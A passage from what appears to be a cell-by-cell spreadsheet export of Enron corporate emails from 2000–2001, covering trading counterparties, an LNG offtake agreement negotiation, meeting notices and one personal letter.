From: 	Shults, Bob  _x000D_
Sent:	Monday, October 08, 2001 11:11 AM_x000D_
To:	Greenberg, Mark_x000D_
Cc:	Jones, Tana_x000D_
Subject:	_x000D_
_x000D_
The agreement should have two counterparties_x000D_
_x000D_
Norwegian Energy Brokers AS and First Energy Brokers AS_x000D_
_x000D_
The products will be:_x000D_
_x000D_
Norwegian Energy Brokers AS will have Nordic Power and Nordic Weather _x000D_
First Energy Brokers AS will have all the other product types (UK Power; UK Gas; European Gas, European Power, European Coal, European Bandwidth) _x000D_
_x000D_
Bob Shults_x000D_
EnronOnline LLC_x000D_
Houston, Texas 77002-7361_x000D_
713 853-0397_x000D_
713 825-6372 cell_x000D_
713 646-2126_x000D_
bob.shults@enron.com</t>
  </si>
  <si>
    <t>Thu, 18 May 2000 05:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ann.white@enron.com', 'tana.jones@enron.com', 'sara.shackleton@enron.com', 'susan.flynn@enron.com', 'carol.clair@enron.com', 'brenda.whitehead@enron.com', 'susan.bailey@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>TAFFY MILLIGAN  - VACATION DAY</t>
  </si>
  <si>
    <t>I will be out of the office on Friday, 5/19.  _x000D_
_x000D_
Brenda, could you please make arrangements for coverage of my desk?_x000D_
_x000D_
_x000D_
taffy</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 12:30:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'liane_kucher@platts.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Return Receipt_x000D_
_x000D_
 Your_x000D_
 document:_x000D_
_x000D_
 was received Liane Kucher/ST/FIS_x000D_
 by:_x000D_
_x000D_
 at:          03:36:15 PM Today_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 13 Jul 2001 12:12:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lawner, Leslie  _x000D_
Sent:	Friday, July 13, 2001 8:50 AM_x000D_
To:	Tholt, Jane M._x000D_
Subject:	_x000D_
_x000D_
How is Deb's knee?  Did she ever go to a real doctor?_x000D_
[Tholt, Jane M.]  _x000D_
YesShe is having physical theraphy 3 times a week.  She said it is getting better.  I haven't seen her for a couple of weeks and have only talked to her.  I wil l probably be calling you next week-the desk wants me to become more involved in regulatory updates so I will seek your assistance with this matter.</t>
  </si>
  <si>
    <t>Thu, 24 Feb 2000 02:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Disclaimer for Internet Site</t>
  </si>
  <si>
    <t xml:space="preserve">This is a follow up note concerning the disclaimer statement for the Western _x000D_
Power internet page.  I would like to know how this is coming?  Has the _x000D_
outside councel reviewed the site yet?  I would like some comments back in _x000D_
the next couple of days if possible._x000D_
_x000D_
View site at :  www.enronwest.com_x000D_
User ID:  user1_x000D_
Password:  test_x000D_
_x000D_
Mike Etringer_x000D_
503-464-3836 </t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 05:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Jose LNG - Crude Pricing</t>
  </si>
  <si>
    <t xml:space="preserve">Eric, is this still a problem or did you get what you needed?_x000D_
m_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Eric Gonzales_x000D_
12/04/2000 06:45 AM_x000D_
To: Eric Groves/HOU/ECT@ECT_x000D_
cc:  (bcc: Mike McConnell/HOU/ECT)_x000D_
Subject: Re: Jose LNG - Crude Pricing  _x000D_
_x000D_
_x000D_
Our ability in crude is apparently very poor.  What can J Wilson do thru _x000D_
2010?  I want the crude desk to make us a price and present an acceptable _x000D_
volume.  _x000D_
_x000D_
If we have to suggest to PDVSA only doing a crude index through 2012, I _x000D_
strongly believe we should try if we can create some additional value thru _x000D_
this structure.  Tell me if you would like me to give him a call to explain _x000D_
what the effort potentially create._x000D_
_x000D_
Thanks_x000D_
Eric_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Eric Groves                           30/11/2000 17:04_x000D_
	_x000D_
_x000D_
To: Guido Caranti/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Emilio _x000D_
Vicens/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Eric Gonzales/LON/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Jose LNG - Crude Pricing  _x000D_
_x000D_
 Per a conversation I had with John Wilson the head crude oil trader in the _x000D_
Houston office, the feasability of hedging price risk linked to WTI or Brent _x000D_
on a 20 year deal is NOT a possibility.  If we had 1/3 of our GSA price _x000D_
linked to Brent our exposure for 20 years would be about 30 million barrels _x000D_
notional or about 14 million barrels PV.  At 5% our exposure would still be 5 _x000D_
million notional or 2.3 million PV.  According to John, he would not be _x000D_
comfortable doing anything past 2012 and even out that far he would not _x000D_
consider doing more than about 1 million PV barrels in the years 2010 - _x000D_
2012.  Given these comments, I would say that the size of our deal basically _x000D_
precludes a look at Crude Oil hedges at this time.  As far as the economics _x000D_
of the deal are concerned, we basically cannot even get an Offer to use to _x000D_
figure out our economics.  I am confident that if we pushed the issue to see _x000D_
if we could get a 20 year offer even for a small portion of the volumes that _x000D_
the hedging costs would be too high, and therefore have left it at that for _x000D_
the time being.   Please advise if you have any thoughts on the issue._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Eric_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Guido Caranti@ENRON_DEVELOPMENT_x000D_
11/29/2000 09:27 AM_x000D_
To: Eric Gonzales/LON/ECT@ECT_x000D_
cc: Emilio Vicens/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt@ECT, Larry _x000D_
Lawyer/NA/Enron@Enron@ECT, Cris Sherman/HOU/ECT@ECT, Brent A _x000D_
Price/HOU/ECT@ECT, Eric Groves/HOU/ECT@ECT, Daniel R _x000D_
Rogers/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
Subject: Re: Jose LNG - Off-take Comments  _x000D_
_x000D_
Eric, thanks for your comments. Please see below in blue our observations and _x000D_
answers. Let's talk later today if you have further questions._x000D_
_x000D_
Saludos_x000D_
_x000D_
Guido and Emilio _x000D_
_x000D_
_x000D_
Enron Offtake Agreement_x000D_
_x000D_
Section 2_x000D_
Should this agreement start at commercial hand over of the plant under the _x000D_
EPC agreement.  Benefit here is LDs under the EPC for late delivery go to _x000D_
project company and project company has no obligation to lng buyers.  In _x000D_
addition it preserves your 20 year offtake which should still match your GSA._x000D_
_x000D_
 The agreement should start at commercial hand over of the plant as you say. _x000D_
The draft as it is now has only outer limits as to when that should happen _x000D_
(that being the earlier of 40 months after Financial  Close or NTP or Dec 31 _x000D_
2004). We will add to this list "the earlier of" something like: "the date on _x000D_
which the plant has produced LNG at at least 90% of its capacity for a period _x000D_
of 10 consecutive days". We suggest putting something like this as opposed to _x000D_
"commercial hand over" because this is in the plant's/contractor's control _x000D_
and they could, for example, on purpose not meet a noise level requirement _x000D_
for 4 months  for example and delay commencement of the offtake contract _x000D_
while the project sells LNG at higher prices than in the term sheets._x000D_
_x000D_
With regards to the EPC LDs we agree that they should go only to the project _x000D_
but we, as offtakers, can not wait for ever for the project to be completed _x000D_
with out receiving gas or damages for something that is somehow (directly or _x000D_
indirectly) under the project's control. We have 4 months limits to how much _x000D_
the project can be delayed on top of all the conservatism that EECC (or _x000D_
another EPC Contractor) already built in.  _x000D_
_x000D_
Section 6_x000D_
I would like to see some language in this section describing the pricing _x000D_
formula associated with expansions.  Structure could be set as in this _x000D_
contract where Pg is to reflect GSA costs and where the combined value of _x000D_
Pcpi and Pa should be derived to provide an equity return to the sponsors of _x000D_
18%._x000D_
_x000D_
 We agree that would be better, but we included this section knowing that is _x000D_
something that is going to be a very difficult sell with PDVSA, because they _x000D_
don't want us to sell down and then keep "controlling" new  LNG businesses in _x000D_
Jose. They will oppose this clause as they violently opposed the limited _x000D_
exclusivity at Jose that we managed to include in the GSA. We think that _x000D_
adding a restriction to the asset's returns now in the draft will make it _x000D_
very tough to sell to PDVSA the entire Clause. Thus, jeopardizing our chance _x000D_
to control the output of future plants or expansions. We never intended to _x000D_
use these off-take agreements as a vehicle to control future LNG volumes. _x000D_
Nevertheless, we felt it was a good chance for us to start getting partial _x000D_
control of the output. Pushing it too much will back fire and PDVSA will _x000D_
clearly realize what our intent is._x000D_
_x000D_
Section 7_x000D_
Where is the bonus calculation?  We did not include it now on purpose. We _x000D_
will include it when ever they "remind" us to do so. We want to have another _x000D_
fight about the bonus._x000D_
Where is the min price? The minimum price is in. We say that one of the  _x000D_
terms in the price is Pg x En where En is never less than one_x000D_
I thought you guys were going to trade out CPI for a fixed number? We are _x000D_
going to try to do it, but that is first a GSA issue, and we don't want to _x000D_
put it here as something firm before we change it in the GSA. We precisely _x000D_
bracketed the CPI percentage in the formula because of our thought that we _x000D_
want to make it zero  _x000D_
Have you decided that a WTI index percentage does not help the economics? No, _x000D_
we don't have the definitive answer from structuring yet, but our guess and _x000D_
based on our meeting with RAC the other day, in which they told us about the _x000D_
mess created by an oil escalation in Cuiba (Brazil power plant), we are _x000D_
pretty much convinced that oil escalation without oil based LNG sales is not _x000D_
convenient. But since we don't have a definitive answer yet we still included _x000D_
oil as a possible escalator with a zero weighting (that should have been _x000D_
bracketed in the term-sheet, though, and it will).  _x000D_
_x000D_
Section 10_x000D_
you have incorporated the GSA default rate for late payment as opposed to the _x000D_
Equilibrium rate.  Is this your intent to have a mismatch?_x000D_
 Yes, we did it on purpose because this will apply also to PDVSA as _x000D_
off-taker, and they have a record of paying late so we want them to suffer if _x000D_
they do._x000D_
_x000D_
you have all new taxes being borne by the project company.  Will the banks _x000D_
accept this as the project company will be thinly capitalized.  See section _x000D_
18 of the Arcos CTA for ideas if this is an issue._x000D_
 The exporter of record will be the project, so the buyer has no business in _x000D_
Venezuela other than paying port fees. We do not see any kind of taxes that _x000D_
could be imposed on Buyer by Venezuela that would eventually be transferred _x000D_
to the project. Banks should be fine with this as this is a risk that _x000D_
projects typically take all the time (the heavy crude projects are some _x000D_
examples in Venezuela). In addition, the GSA provides for a number of reliefs _x000D_
for the Project Company that will help Banks and equity holders to feel _x000D_
safer. Although, a large portion of the underlying risk is always there. _x000D_
_x000D_
Other_x000D_
where are the LD calculations explained?  I think you need LDs for GSA _x000D_
default and another for plant default.  GSA default should match LD's in GSA _x000D_
contract less compensation to plant debt recovery._x000D_
 In stead of writing an explicit LD calculation our lawyers suggested that _x000D_
the sole use of New York law to rule the deal was simpler and better. New _x000D_
York law provides for full market based damages (market price of commodity _x000D_
plus extra costs) which is the maximum you can get in a negotiation for an LD _x000D_
clause. So, from a legal and commercial point of view we much rather have it _x000D_
as it is. We are still discussing w/ Brent Price and Cris Sherman if this is _x000D_
sellable to AA for MTM, but our initial view is that it should be since the _x000D_
level of LD can not be better. GSA default is market based (provided that _x000D_
PDVSA, as we expect, accepts the change we will propose) so the Project _x000D_
Company will be able to pay market based damages. For interruption of gas _x000D_
supply from PDV for Force Majeure reasons our insurance team is finding out _x000D_
if the market will cover such risk so that the project can afford not being _x000D_
relieved from performance in such event (this will obviously be to a maximum _x000D_
dollar limit to be determined and for a maximum period of time, say 36 months _x000D_
- we need time to give you precision on this, but some sort of coverage will _x000D_
be available). _x000D_
_x000D_
suppose the plant produces 5% less that it is supposed to due to design or _x000D_
tech problems (not a FM issue) at commercial hand over.  What happens under _x000D_
the offtake agreements?  Will the banks accept this revenue short fall?  Will _x000D_
we have to create a reserve?  This may be a big issue with the banks for _x000D_
technology reasons and lack of experience in this industry._x000D_
  Under the off-take agreements the project pays market based damages if it _x000D_
does not meet the contracted volume. We believe that the contracted volume _x000D_
that we included in the term sheets though has enough of a cushion for banks _x000D_
and equity holders to bear the risk. We are contracting for contractually _x000D_
guaranteed production under the EPC which is 3% lower than expected. On top _x000D_
of that we are considering LNG production with the richest inlet gas possible _x000D_
(meaning a lower LNG volume). This volume is 5% lower than the guaranteed _x000D_
production with "Normal" or expected feed composition. Combining these two we _x000D_
have a contracted quantity that is 8% lower than the expected production with _x000D_
expected feed. On top of this it is important to note that every single LNG _x000D_
plant in the world ended up with a production capacity that is at least 10% _x000D_
above what was expected (mostly due to EPC Contractors and tech partners _x000D_
making very safe assumptions on guaranteed volumes to avoid LDs). Also the _x000D_
EPC contract being negotiated provides for pretty severe LD in case of _x000D_
production shortfalls that are enough to pay for debt and make equity-holders _x000D_
whole. They don't provide though, for damages payable under off-take _x000D_
contracts (nobody will take this potentially huge exposure on LDs). However, _x000D_
as we explained, we believe that this is a risk that is typically taken by _x000D_
producers and that we have already taken a very conservative assumption in _x000D_
the volume contracted and that should be beard by the Project Co. Banks will _x000D_
most definitely also take a conservative volume assumption, as we already _x000D_
did. _x000D_
_x000D_
What happens if plant starts producing less for a few weeks until problem is _x000D_
resolved? what compensation do the offtakers get? do the banks suffer here as _x000D_
well?_x000D_
 The term sheet establishes an annual quantity as the only standard to _x000D_
determine failure to deliver by Seller. It also establishes that deliveries _x000D_
should be at rates and intervals that are reasonably constant. The bottom _x000D_
line is that the termsheets do not go into all the detail about timing of _x000D_
defaults and price differentials. It sets, however, a reasonable standard by _x000D_
which if at the end of the year seller did not deliver the full annual _x000D_
quantity and a particular month can be identified where the deficiency occur _x000D_
based on the "reasonable constant deliveries" provision, damages will be _x000D_
payable based on prices during such month. Yes banks suffer here to the _x000D_
extent that the cause of the short fall is not insurable.  Nevertheless, _x000D_
short periods (weeks) of failures to deliver by seller will really not affect _x000D_
the Project Company ability to pay the Banks.  It will have to be some _x000D_
prolonged period for Banks to be affected.   _x000D_
_x000D_
Under a plant FM issue you may not get BI cover for the first 60 days.  Will _x000D_
the banks accept this or will they want a reserve established.  Is this in _x000D_
your model?_x000D_
 We are not sure off what the banks are going to require in this regard _x000D_
(although, we agree that some sort of reserve or LC is to be expected). Our _x000D_
model assumes the cost of an LC for 6 month debt service (which should be _x000D_
plenty). The issue here is if MTM is going to be able to live with the same _x000D_
or longer grace period for damages to kick in under the termsheet and weather _x000D_
damages (not BI) are insurable and to what extent if FM relief is not _x000D_
permitted for MTM reasons. The question that follows is: if damages exceed _x000D_
the insured limits in a FM event that does not relief the project from its _x000D_
obligation to deliver, have the damages have to be senior to debt payments _x000D_
for AA to allow MTM to be permitted? If this is so, are the banks going to be _x000D_
willing to live with this?, probably not._x000D_
_x000D_
insert something on planned maintenance timing and scheduling._x000D_
 It is briefly covered in section 9 second paragraph. This will be expended _x000D_
in later drafts once the PA is signed and we are home free with regard to _x000D_
PDVSA._x000D_
_x000D_
insert termination section_x000D_
 In light of the fact that we will end up being more of an off-taker than an _x000D_
asset owner in this project our lawyers suggest that we will get better _x000D_
protection if early termination is ruled by what is provided under NY law _x000D_
than if we try to right an early termination clause. They point out also that _x000D_
90% of LNG contracts are done in this way, having NY law rule the game. They _x000D_
point out also that from the project point of view banks are very used to and _x000D_
prefer having early termination be ruled by NY law._x000D_
  _x000D_
put something in about the buyer willing to accept entering direct agreements _x000D_
for financing requirements?_x000D_
 We will_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Eric Gonzales@ECT_x000D_
11/28/2000 03:40 AM_x000D_
To: Guido Caranti/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Emilio _x000D_
Vicens/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt_x000D_
cc: Larry Lawyer/NA/Enron@Enron, Cris Sherman/HOU/ECT@ECT, Brent A _x000D_
Price/HOU/ECT@ECT, Eric Groves/HOU/ECT@ECT, Daniel R _x000D_
Rogers/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Re: Jose LNG - Off-take Comments  _x000D_
_x000D_
_x000D_
Enron Offtake Agreement_x000D_
_x000D_
Section 2_x000D_
Should this agreement start at commercial hand over of the plant under the _x000D_
EPC agreement.  Benefit here is LDs under the EPC for late delivery go to _x000D_
project company and project company has no obligation to lng buyers.  In _x000D_
addition it preserves your 20 year offtake which should still match your GSA._x000D_
_x000D_
Section 6_x000D_
I would like to see some language in this section describing the pricing _x000D_
formula associated with expansions.  Structure could be set as in this _x000D_
contract where Pg is to reflect GSA costs and where the combined value of _x000D_
Pcpi and Pa should be derived to provide an equity return to the sponsors of _x000D_
18%._x000D_
_x000D_
Section 7_x000D_
Where is the bonus calculation? _x000D_
Where is the min price?_x000D_
I thought you guys were going to trade out CPI for a fixed number?_x000D_
Have you decided that a WTI index percentage does not help the economics?_x000D_
_x000D_
Section 10_x000D_
you have incorporated the GSA default rate for late payment as opposed to the _x000D_
Equilibrium rate.  Is this your intent to have a mismatch?_x000D_
you have all new taxes being borne by the project company.  Will the banks _x000D_
accept this as the project company will be thinly capitalised.  See section _x000D_
18 of the Arcos CTA for ideas if this is an issue._x000D_
_x000D_
Other_x000D_
where are the LD calculations explained?  I think you need LDs for GSA _x000D_
default and another for plant default.  GSA default should match LD's in GSA _x000D_
contract less compensation to plant debt recovery._x000D_
suppose the plant produces 5% less that it is supposed to due to design or _x000D_
tech problems (not a FM issue) at commercial hand over.  What happens under _x000D_
the offtake agreements?  Will the banks accept this revenue short fall?  Will _x000D_
we have to create a reserve?  This may be a big issue with the banks for _x000D_
technology reasons and lack of experience in this industry._x000D_
What happens if plant starts producing less for a few weeks until problem is _x000D_
resolved? what compensation do the offtakers get? do the banks suffer here as _x000D_
well?_x000D_
Under a plant FM issue you may not get BI cover for the first 60 days.  Will _x000D_
the banks accept this or will they want a reserve established.  Is this in _x000D_
your model?_x000D_
insert something on planned maintenance timing and scheduling._x000D_
insert termination section_x000D_
put something in about the buyer willing to accept entering direct agreements _x000D_
for financing requirements?_x000D_
_x000D_
_x000D_
_x000D_
Marketing Agreement_x000D_
Lets talks about his one_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Guido Caranti@ENRON_DEVELOPMENT_x000D_
22/11/2000 23:34_x000D_
To: Cris Sherman@ECT, Larry Lawyer@Enron, Brent A Price@ECT, Eric Groves@ECT, _x000D_
Eric Gonzales@ECT_x000D_
cc: Les Webber/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Nancy _x000D_
Corbet/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Emilio _x000D_
Vicens/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Jose LNG - Off-take_x000D_
_x000D_
I am enclosing a draft of the off-take termsheets to be included in the _x000D_
Participation Agreement between Enron and PDVSA Gas. These termsheets will _x000D_
rule the following transactions:_x000D_
_x000D_
  a) Sale of LNG from the Project to an affiliate of  Enron for the plant's _x000D_
output minus PDVSA's off-take_x000D_
_x000D_
  b) Sale of LNG from the project to and affiliate of PDVSA Gas for the share _x000D_
of volumes equivalent their equity participation in the Project Co_x000D_
_x000D_
  c) Re-sale of LNG from the affiliate of PDVSA Gas to the Enron affiliate _x000D_
for the volumes purchased by PDVSA according to b) above_x000D_
_x000D_
Please let Emilio and I know your comments about them at your earliest _x000D_
convenience. Please focus on issues with regard to our ability to MTM these _x000D_
contracts, such as the force majeure clause. If you have any comments or _x000D_
questions during the weekend you can reach me at 713 304-4264 or Emilio at _x000D_
011 5814 330-9016. Otherwise we would like to discuss this with you on Monday._x000D_
_x000D_
Thanks for your input and happy Thanks-giving_x000D_
_x000D_
Guido_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 9 Nov 2000 03:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lola.willis@enron.com'})</t>
  </si>
  <si>
    <t>Re: Profiles Manager Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Will attend._x000D_
_x000D_
_x000D_
_x000D_
	Lola Willis@ENRON_x000D_
	11/09/2000 11:01 AM_x000D_
		 _x000D_
		 To: Tom Moran/HOU/ECT@ECT, Bradley Diebner/HOU/ECT@ECT, Tana _x000D_
Jones/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, _x000D_
Karen O'Day/NA/Enron@Enron, Thomas Engel/HOU/ECT@ECT, Jennifer deBoisblanc _x000D_
Denny/HOU/ECT@ECT, Sheri Thomas/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT, Laura _x000D_
Levy/NA/Enron@Enron, Connie Kwan/NA/Enron@ENRON, Francesc _x000D_
Guillen/NA/Enron@Enron, Ajay Sindwani/NA/Enron@Enron, Steve _x000D_
Venturatos/HOU/ECT@ECT, Frank L Davis/HOU/ECT@ECT, Lisa Lees/HOU/ECT@ECT, _x000D_
Mary G Gosnell/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Profiles Manager Meeting_x000D_
_x000D_
You are invited to attend a Profiles Manager Meeting_x000D_
_x000D_
_x000D_
Date                                                               11/10/00_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Time                                                                3:00- 5:00_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Location                                                           Training _x000D_
Room EB 572_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 May 2000 01:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'beverly.stephens@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jeff.donahue@enron.com', 'raymond.bowen@enron.com', 'ozzie.pagan@enron.com', 'phillip.allen@enron.com', 'john.lavorato@enron.com', 'w.duran@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>Dinner Meeting 5/23/00</t>
  </si>
  <si>
    <t>This will confirm our dinner meeting to be held May 23, 2000 at the River _x000D_
Oaks Grill_x000D_
_x000D_
   DATE    MAY 23, 2000_x000D_
   PLACE   WINE ROOM_x000D_
       RIVER OAKS GRILL_x000D_
       2630 WESTHEIMER_x000D_
       (713) 520-1738_x000D_
   TIME    6:30 PM_x000D_
_x000D_
_x000D_
If you have any questions, please do not hesitate to contact Kay (30643) or _x000D_
Beverly (57857)_x000D_
_x000D_
I will look forward to seeing you there.</t>
  </si>
  <si>
    <t>Tue, 10 Jul 2001 23:52:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'-nikole@excite.com'})</t>
  </si>
  <si>
    <t>Stranger???</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
HI there stranger!_x000D_
_x000D_
Well I haven't spoken to you or heard from you in a few days and I'm just_x000D_
checkin' to see that my lil' buddy in Portland isn't working himself too_x000D_
hard.  As you know I tried to call you tonight but then had to leave for a_x000D_
workout and a scrimmage soccer game.  I am so sore!  It's out of control!_x000D_
_x000D_
Ok so down to the REAL reason I'm writing.  Brendan and I had a great time_x000D_
at Happy Hour.  We talked a little about you but mostly about life in_x000D_
general.  He had mentioned that he had E-mailed me so I rushed home to check_x000D_
it._x000D_
_x000D_
Basically he said all good things but there was one thing that struck me as_x000D_
odd.  I guess because he also brought the same point up at the restraunt._x000D_
He had written that although you thought I was cool and whatever you had_x000D_
commented on how "strange " the situation was and he sort of elaborated on_x000D_
that._x000D_
_x000D_
So the point of this E-mail is I guess to reassure you that I only have the_x000D_
best intentions towards you.  I am not trying to be your girlfriend or_x000D_
anything similar to that.  To tell you the truth I don't even know what your_x000D_
"romantic" situation is.  I just think you are an awesome guy whom I'd love_x000D_
to become close friends with._x000D_
_x000D_
 I am ecstatic that you are coming to visit me in Huntington Beach (if you_x000D_
still are) and I'm thrilled that we can go sight seeing touring together.  I_x000D_
bragged and bragged to Brendan about what a great guy you were and then came_x000D_
home to feel like maybe you were taken back by my advances.  I really am_x000D_
just a very overly affectionate and loving person( not to mention_x000D_
spontaneous).  I didn't mean to scare you away from having a great_x000D_
friendship with me and me with you._x000D_
_x000D_
For heavens sake you are my Portland connection and I'm your beach bum_x000D_
buddy.  Honestly if I were a psycho I would have jumped at the chance to_x000D_
come up and see your condo when you offered.  I just think you are someone_x000D_
I'd love to get to know.  Especially if you are anything like Brendan (which_x000D_
best friends usually are) he is such a sweetie!  When he and Meg go to visit_x000D_
her mom in LA they might just stop over for a visit and of course they are_x000D_
welcome to stay with me as well._x000D_
_x000D_
I guess I never asked if you had a girlfriend or someone in your life and to_x000D_
be quite honest I didn't even think to ask Brendan because it's not_x000D_
important.  I want you, Bill, for your friendship and for your companionship_x000D_
now and when I move to Portland.  Reflecting back I realize that I may have_x000D_
written or said something that caught you off guard.  It's just my_x000D_
personality.  I'm a huge flirt.  For heavens sake I was voted "Most_x000D_
flirtatious" my senior year not to mention "Most likely to succeed"._x000D_
Probably the second one due to the first but who knows!  Hahaha!  I'm only_x000D_
teasing._x000D_
_x000D_
Ok seriously now Bill, I want you to be honest.  If I did (locating your_x000D_
condo etc.) or said (like that was the most romantic thing I had ever read_x000D_
that was written by a guy) something to upset you or give you a false_x000D_
impression I am so sorry. I do find you attractive and perhaps if we lived_x000D_
in the same town or had met a little differently or for that matter I knew_x000D_
your "romantic" stiuation, yeah I would have jumped at the chance to have_x000D_
dated you.  But we didn't and the truth is I can never have too many_x000D_
friends.  Especially good looking ones that I can introduce to all my "girl"_x000D_
friends so that they can be jealous with envy! :)_x000D_
_x000D_
Like I said I only have the best of intentions towards you and towrds our_x000D_
relationship as friends.  But if you are uncomfortable with something I've_x000D_
done or said I am so very sorry and all you have to do is tell me or E-mail_x000D_
me and you'll never hear from me again.  Scouts honor!  I 've never been a_x000D_
scout but I'm not know for my lies either. Teehee._x000D_
_x000D_
I would love to hear any concerns that you might have in regards to our_x000D_
realtionship as friends.  If I can I'll put your mind at ease if not well I_x000D_
enjoyed our short 30 minute interlude.  As always you are still welcome to_x000D_
come visit me and stay with me I would love to have the company._x000D_
_x000D_
If I don't hear form you within the next couple of weeks I'll assume the_x000D_
worst but still try to keep my schedule as flexible as possible in case you_x000D_
change your mind.  I'm lucky in the fact that I can do that sort of thing!_x000D_
:)  Ok just E-mail me or call me.  Let me know that you are alive and_x000D_
kickin'._x000D_
_x000D_
 I'll be leaving for Calgary, Canada this Thursday morning at 6 am and will_x000D_
be there until the 16th.  I'm so excited this is my first trip out of_x000D_
country but then again you know that!  So I guess I'll hear from you when I_x000D_
hear from you._x000D_
_x000D_
I just thought of a last possible reason... I may be way off base here but I_x000D_
am not sure if you know the situation between my boyfriend and myself.  He_x000D_
is a real sweetheart and he's going to make a wonderful husband and_x000D_
father... just not with me.  If you are concerned about our friendship and_x000D_
him becoming weird well the majority of my friends are guys and Todd is_x000D_
secure enough in himself that he doesn't care.  If this is about August and_x000D_
you staying with me, my father is moving me down not him and it will be a_x000D_
long time until he can come to visit.  Also when I get there we are not_x000D_
going to continue a long distance exclusive relationship.  I haven't dated_x000D_
or had much of a wild stage and I have told him that we will see other_x000D_
people.  He's fine with that as well._x000D_
_x000D_
Ok I admit that his Potland stunt was a little irrational but hey I thought_x000D_
it was thoughtful and darling.  I love surprises and little "extras".  I_x000D_
just didn't expect to have made plans and make myself look like the bad guy_x000D_
to someone whom I'd never met.  Therefore I did everything in my power to_x000D_
rectify the situation and make both sides happy and in doing so caused this._x000D_
You think I'm a psycho!  Not to mention I had to face Brendan and before he_x000D_
could read my E-mail you had already revealed the stroy to him!!  SO I got_x000D_
to be embarrssed and a little humbled by the whole experience!_x000D_
_x000D_
Ok that's it.  take it however you will but it's 12:51am and I'm exhausted!_x000D_
I did the best I could to figure out and fix a possibly non-existing_x000D_
problem.  I hope I did well enough to inspire a response from you.  :)  Hope_x000D_
to hear or read from you soon!_x000D_
_x000D_
Goodnight and God Bless,_x000D_
_x000D_
Nikki_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
________________________________________________________x000D_
Send a cool gift with your E-Card_x000D_
http://www.bluemountain.com/giftcenter/_x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 02:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ggreen2@txu.com', 'cstone1@txu.com', 'kenenglish@txu.com', 'gary.a.hanks@enron.com', 'mjones7@txu.com', 'liz.bellamy@enron.com', 'daren.j.farmer@enron.com', 'slooney1@txu.com', 'earl.tisdale@enron.com'})</t>
  </si>
  <si>
    <t>HPL Noms. for Jan. 17, 2001</t>
  </si>
  <si>
    <t>(See attached file: HPLN0117.xls)_x000D_
_x000D_
 - HPLN0117.xls</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 07:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jad.doan@enron.com', 'andres.balmaceda@enron.com', 'bruce.mills@enron.com', 'victor.guggenheim@enron.com', 'sladana-anna.kulic@enron.com', 'chuck.ames@enron.com'})</t>
  </si>
  <si>
    <t>duplicate deals</t>
  </si>
  <si>
    <t xml:space="preserve">FYI - keep an eye out for these._x000D_
PL_x000D_
_x000D_
---------------------- Forwarded by Phillip M Love/HOU/ECT on 04/03/2001 _x000D_
02:10 PM ---------------------------_x000D_
_x000D_
_x000D_
Dawn C Kenne_x000D_
04/03/2001 10:55 AM_x000D_
To: Jeffrey C Gossett/HOU/ECT@ECT, Kam Keiser/HOU/ECT@ECT, Darron C _x000D_
Giron/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT, Errol _x000D_
McLaughlin/Corp/Enron@ENRON, John Swinney/Enron@EnronXGate, Shifali _x000D_
Sharma/Enron@EnronXGate, Enron London - EOL Product Control Group/LON/ECT@ECT_x000D_
cc: Tara Sweitzer/HOU/ECT@ECT, Torrey Moorer/HOU/ECT@ECT _x000D_
Subject: duplicate deals_x000D_
_x000D_
Tagg is currently working on a situation where the bridge is creating _x000D_
